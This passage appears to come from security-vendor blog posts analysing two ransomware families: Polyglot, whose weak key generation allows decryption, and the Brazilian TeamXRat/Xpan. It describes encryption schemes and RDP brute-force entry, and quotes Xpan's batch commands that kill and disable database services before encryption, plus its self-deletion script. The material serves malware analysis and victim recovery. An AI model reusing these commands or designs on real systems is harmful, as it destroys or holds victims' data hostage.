The Trojan creates the structure decryption_info and writes the following to it: a random sequence used as the basis for creating the key s_ec_priv_1, the string machine_guid taken from the registry, and a few zero bytes.

struct decryption_info

{
        char s_rand_str_1[32];
        char machine_guid[36];
        char zeroes[12];
};

Using the private key s_ec_priv_2 and the cybercriminal’s public key mal_pub_key produces the shared secret mal_shared_secret = ECDH(s_ec_priv_2, mal_pub_key). The structure decryption_info is encrypted with algorithm AES-256-ECB using a key that is the SHA256 digest of this secret. For convenience, we shall call the obtained 80 bytes of the encrypted structure encrypted_info.

Only when Polyglot obtains the encrypted_info value does it proceed to generate the session key AES for the file. Using the above method, a new pair of keys is generated, f_priv_key and f_pub_key. Using f_priv_key and s_ec_pub_1 produces the shared secret f_shared_secret = ECDH(f_priv_key, s_ec_pub_1).

The SHA256 digest of this secret will be the AES key with which the file is encrypted.

To specify that the file has already been encrypted and that it’s possible to decrypt the file, the cybercriminals write the structure file_info to the start of each encrypted file:

struct file_info

{
        char label[4] = {‘H’,’U’, ‘I ‘, 0x00};
        uint32_t label2 = 1;
        uint64_t archive_size;
        char f_pub_key[32];
        char s_ec_pub_1[32];
        char s_ec_pub_2[32];
        char encrypted_info[80];
};

The elliptic curve, the Diffie-Hellman protocol, AES-256, a password-protected archive – it was almost flawless. But not quite, because the creator of Polyglot made a few mistakes during implementation. This gave us the opportunity to help the victims and restore files that had been encrypted by Polyglot.

Mistakes made by the creators

As was mentioned earlier, all the created keys are based on a randomly generated array of characters. Therefore, the strength of the keys is determined by the generator’s strength. And we were surprised to see the implementation of this generator:

A graphical representation of the random sequence generation procedure

Let’s convert this function into pseudocode so it’s easier to follow:

Please note that when another random byte is selected, the entire result of the function rand() is not used, just the remainder of dividing the result by 32. Only the cybercriminal knows why they decided to make the random string this much weaker – an exhaustive search of the entire set of the possible keys produced by such a pseudo-random number generator will only take a few minutes on a standard PC.

Taking advantage of this mistake, we were able to calculate the AES key for an encrypted file. Although there was a password-protected archive below the layer of symmetric encryption, we already knew that the cybercriminal had made another mistake.

Let’s look at how the archive key is generated:

We can see that the key length is only 4 bytes; moreover, these are specific bytes from the string MachineGuid, the unique ID assigned to the computer by the operating system. Furthermore, a slightly modified MachineGuid string is displayed in the requirements text displayed to the victim; this means that if we know the positions in which the 4 characters of the ZIP archive password are located, we can easily unpack the archive.

The MachineGuid string displayed in the requirements screen

Conclusion

Files that are encrypted by this cryptor can be decrypted using Kaspersky Lab’s free anti-cryptor utility RannohDecryptor Version 1.9.3.0.

All Kaspersky Lab solutions detect this cryptor malware as:
Trojan-Ransom.Win32.Polyglot
PDM:Trojan.Win32.Generic

MD5

c8799816d792e0c35f2649fa565e4ecb – Trojan-Ransom.Win32.Polyglot.a

TeamXRat: Brazilian cybercrime meets ransomware

Thu, 09/29/2016 - 12:42

Brazilian cybercriminals are notorious for their ability to develop banking trojans but now they have started to focus their efforts in new areas, including ransomware. We discovered a new variant of a Brazilian-made ransomware, Trojan-Ransom.Win32.Xpan, that is being used to infect local companies and hospitals, directly affecting innocent people, encrypting their files using the extension “.___xratteamLucked” and asking to pay the ransom.

The Kaspersky Anti-Ransom team decrypted the Xpan Trojan, allowing them to rescue the files of a Hospital in Brazil that had fallen victim to this Ransomware family.

Actually, this is not the first ransomware to come out of Brazil. In the past, we investigated TorLocker and its flawed encryption, which was created and negotiated worldwide by a Brazilian cybercriminal. We also saw a lot of copycats use HiddenTear in local attacks. Trojan Ransom Xpan was created by an organized gang, which used targeted attacks via RDP that abused weak passwords and wrong implementations.

In this post, we’ll explain this new Ransomware family and how Brazilian coders are creating new ransomware from scratch.

The group behind the attack

The group identifies itself as “TeamXRat“and “CorporacaoXRat“.
(Translating from Portuguese to English as “CorporationXRat”)

Their first ransom trojan consisted of using a simple XOR based encryption, described by some victims here (most of the victims are from Brazil). The new version of Xpan Ransomware shows that the cybercriminals behind it have improved the code to make it more complex, also switching the encryption scheme.

The ransom texts used by the group are written in Portuguese from Brazil. The messages do not inform how much the victim has to pay to retrieve their files, nor the payment method required (which is usually Bitcoins). Instead, they instruct the victim to send an email to one of the anonymous email services Mail2Tor or Email.tg. For example, corporacaoxrat@mail2tor.com, xRatTeam@mail2tor.com and xratteam@email.tg providing the public key used by the ransomware to encrypt the files. Older versions of this ransomware also used e-mail accounts from another Email service – Protonmail, such as corporacaoxrat@protonmail.com, currently deactivated.

When the victim gets in touch with the group, they start to negotiate the ransom payment. All communication is in Portuguese and they request 1 btc (about 603 USD) to decrypt the files. The group also claims that the payment is a “donation” arguing that “they exploited flaws in your system and carried out the attack in order to make sure you increase your security”. Finally, the cybercriminals also offer to decrypt one file for free:

“For me only the ‘donation’ is important. Not your files. If your files are important to you, I advise you to make the donation; otherwise, you’ll lose all your files”

Xpan, how it works

The sample is UPX packed. Once executed it checks the default language of the infected system set in the following registry key: HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE

In addition, it’s able to query local time and obtain the computer name from the registry using several commands like net.exe, sc.exe, and taskkill.exe. Interestingly, it also deletes any Proxy setting defined in the system, located in: HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP.

Since the targets are companies and corporations, the group might use proxies blocking access to certain Web resources. It is highly probable that this technique is used to “set victim’s free” while emailing the attackers or accessing BTC resources online.

After completing its execution, the ransomware displays the following image in the affected system:

“All your files were encrypted using a RSA 2048 bits encryption”

The sample is written in C++ and uses STL, being built as a console application. During the lenght of its execution, it logs all its actions to the console, only to clear it once the encryption process has finished.

The operation of this malware is ‘guided’ by the configuration data block stored inside the body of the Trojan:

Decrypted configuration block

The configuration contains the following details:

  • Drive letters which will be processed;
  • Blacklisted substrings: the files whose path contain any of these strings will not be encrypted;
  • Ransomware text message for the victim;
  • Extension of the encrypted files (in this case, .____xratteamLucked);
  • Name of the file with ransom notes;
  • Console commands to be executed prior to the process of file encryption;
  • Console commands to be executed after the encryption;
  • A public RSA-2048 key in the MSBLOB format.

Part of the pseudocode of the main procedure

From Xorist to Xpan

A previous ransomware sample that was believed to be part of the TeamXRat ransomware campaign used a simple encryption algorithm known as TEA (or Tiny Encryption Algorithm). After comparing this original version (dubbed Xorist) against this new Xpan variant, we could observe that now they are using an AES-256 encryption scheme.

Xorist ransomware TEA constant

Xpan ransomware now has evolved to use AES-256 encryption

Xorist Xpan Will automatically start when user is logged in. It uses the following registry key for persistence: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run No persistence used. Tiny Encryption Algorithm AES-256 ASM, MS Linker C++, MinGW compiler Includes a list of files that are to be encrypted. Will encrypt everything except .exe and .dll files and files with blacklisted substrings in the path.

The developers have clearly shifted their development procedures in the Xpan malware. It’s typical for cybercriminals to evolve their techniques once a decryption method has been found for their ransomware, or that specific variant is widely detected.

List of file extensions that Xorist ransomware will search and encrypt

File Encryption

The trojan uses the implementation of cryptographic algorithms provided by MS CryptoAPI. The files are encrypted by AES-256 in CBC mode.

There are 2 known versions of this trojan that can be distinguished by their extensions. The 1st one uses “___xratteamLucked” (3 ‘_’ symbols) and the second one – “____xratteamLucked” (4 ‘_’ symbols).

These 2 versions employ different techniques to encrypt the files, which we will describe in more detail.

Version 1 (3 ‘_’ symbols in the extension)

The trojan generates a single 255-symbol password for all files. This password is encrypted by RSA-2048 and put into the ransom note (concatenated with the public key). Then the trojan produces a 256-bit key from this password using the API CryptDeriveKey; this key will be used to encrypt all files.

When processing each file, the malware adds the string ‘NMoreira’ to the beginning of the original file and encrypts the file content by 245-byte blocks using the AES-256 algorithm in CBC mode. Each block is additionally XOR’ed with a random byte which is stored before the padding of the corresponding block.

Version 2 (4 ‘_’ symbols in the extension)

For each file, the trojan generates a new 255-symbol password, encrypts this password by RSA-2048 and puts this data into the beginning of each encrypted file. Then, the trojan produces a 256-bit key from this password using the API CryptDeriveKey, and uses this key to encrypt the original file content (AES-256 CBC).

File search and encryption is carried out by multiple threads, each thread processes its disk.

Ransomware in action: console output inform the files encrypted

After encryption is completed, the malware will change the wallpaper in the desktop and display this file, with the ransom note:

The ransom note, in Portuguese

Before encrypting the data in the affected system, the ransomware executes the following commands, aiming to stop popular database services, to be sure that database files will be encrypted as well, so they cause a greater damage to the victim:

echo Iniciando pre comandos

echo Parando Firbird
sc config FirebirdServerDefaultInstance start=disabled
taskkill /IM fb_inet_server.exe /F
net stop FirebirdServerDefaultInstance

echo parando SQL SERVE

taskkill /IM sqlservr.exe /F
sc config MSSQLSERVER start=disabled
sc config MSSQL$SQLEXPRESS start=disabled
net stop MSSQLSERVER
net stop MSSQL$SQLEXPRESS

echo parando poostgree
taskkill /IM pg_ctl.exe /F
sc config postgresql-9.0 start=disabled
net stop postgresql-9.0

After the execution, the ransomware deletes itself from the system, to remove the original infector:

@echo off
  goto Delete
  :WaitAndDelete
  @timeout 5
  :Delete
  @del “path\sample_name.exe”
  if exist “path\sample_name.exe”
  goto WaitAndDelete
  @del %0

After the encryption has finished, the trojan modifies the registry to add a custom handler for the action of double-clicking on any of the encrypted files. As a result, when the victim clicks on a file with the extension “.____xratteamLucked“, the command stored in the registry is executed, and this command shows the ransom notes in a new window using msg.exe (a standard utility which is a part of Windows distribution).

Windows Registry modified by the ransom

How they attack

Most of the attacks performed by TeamXRat are performed manually, installing the ransomware in the hacked server. To achieve that, they perform RDP (Remote Desktop Protocol) brute force attacks. Connecting remote desktop servers directly to the Internet is not recommended and brute forcing them is nothing new; but without the proper controls in place to prevent or at least detect and respond to compromised machines, brute force RDP attacks are still relevant and something that cybercriminals enjoy. Once the server is compromised, the attacker manually disables the Antivirus product installed on the server and proceeds with the infection itself.

We are also aware that vulnerabilities such as MS15-067 and MS15-030 in the RDP protocol, which allow remote code execution if an attacker sends a specially crafted sequence of packets to a targeted system, can be used by cybercriminals if a server is not patched and exposed to attacks.

As we saw in the recent xDedic research, vulnerable servers with exposed RDP connections are very valuable assets in the hands of cybercriminals. Not surprisingly, Brazil was the country with the most compromised servers being offered in the underground market to any cybercriminal.

xDedic: compromised Brazilian RDP servers were available in the underground market

Decryption: we can help!

If the victim pays the ransom, the cybercriminals will send this tool to decrypt the files:

Decryption tool sent by the bad guy after payment

But the good news is that the Kaspersky Anti-Ransom team was able to break the encryption used by the Xpan Trojan. This effort made possible the decryption of files belonging to a Hospital in Brazil, which was hit by this Ransomware family.

If you’re a victim of this new Ransomware family and need help to decrypt your files, please DON’T PAY the ransom. Instead, contact us via support.

Conclusion

As we can see, Brazilian bad guys are now diversifying their “business” with new ransomware families developed from scratch, abandoning older versions that used XOR encryption and adopting new, more robust encryption algorithms. This is a clear signal that they have started to explore new schemes with new targets and newer types of attacks.

As we forecasted in the beginning of this year, we expect ransomware attacks to gain ground on banking trojans and to transition into other platforms. Ransomware has two advantages over traditional banking threats: direct monetization using an anonymous payment system (usually Bitcoin), and relatively low cost per victim. Certainly, this is very attractive to Brazilian crooks, well-known for their banking trojans development. Brazilian law enforcement is very good at catching criminals (although they are not always convicted and imprisoned) by “following the money”, something that we know it’s not entirely possible for Bitcoin payments.

We detect this new threat as
Trojan-Ransom.Win32.Xpan.a and PDM:Trojan.Win32.Generic.

We’ll keep an eye out or new variants, which surely will appear from same or other threat actors.

MD5 reference: 34260178f9e3b2e769accdee56dac793